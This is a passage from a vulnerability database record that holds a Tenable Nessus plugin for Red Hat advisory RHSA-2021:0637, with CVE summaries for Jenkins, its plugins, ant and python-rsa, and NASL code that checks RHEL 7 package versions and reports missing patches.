jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 59, 79, 200, 377, 385, 502, 611, 770, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:python2-rsa", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-27T03:33:23", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "acc14624b5e29d6a8229f90d3020af88", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://bugzilla.redhat.com/1889972", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/862.html", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/502.html", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1895946", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2020-2308", "CVE-2021-21609", "CVE-2021-21607", "CVE-2020-2304", "CVE-2021-21608", "CVE-2021-21606", "CVE-2020-2307", "CVE-2020-2306", "CVE-2021-21604", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21610", "CVE-2020-2309", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-07-29T03:29:36", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0039", "RHSA-2021:0429", "RHSA-2021:0423", "RHSA-2021:0037", "RHSA-2021:0282", "RHSA-2021:0637", "RHSA-2021:0719", "RHSA-2021:0034", "RHSA-2021:0038", "RHSA-2020:2618"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "REDHAT-RHSA-2021-0034.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "EULEROS_SA-2021-1133.NASL", "GENTOO_GLSA-202011-18.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0038.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"]}, {"type": "archlinux", "idList": ["ASA-202101-41", "ASA-202005-15", "ASA-202012-5"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21609", "RH:CVE-2020-2307", "RH:CVE-2020-11979", "RH:CVE-2020-2308", "RH:CVE-2021-21605", "RH:CVE-2021-21611", "RH:CVE-2020-25658", "RH:CVE-2020-2306", "RH:CVE-2020-1945", "RH:CVE-2021-21602", "RH:CVE-2020-2304", "RH:CVE-2021-21608", "RH:CVE-2021-21603", "RH:CVE-2021-21607", "RH:CVE-2021-21606", "RH:CVE-2020-2305", "RH:CVE-2021-21610", "RH:CVE-2021-21604", "RH:CVE-2020-2309"]}, {"type": "cve", "idList": ["CVE-2021-21611", "CVE-2021-21609", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21604", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21602", "CVE-2021-21605"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979", "UB:CVE-2020-25658"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-XRX6-FMXQ-RJJ2", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:88EAA30905CF", "FEDORA:2D51F60C28B2"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}], "modified": "2021-07-29T03:29:36", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-07-29T03:29:36", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n 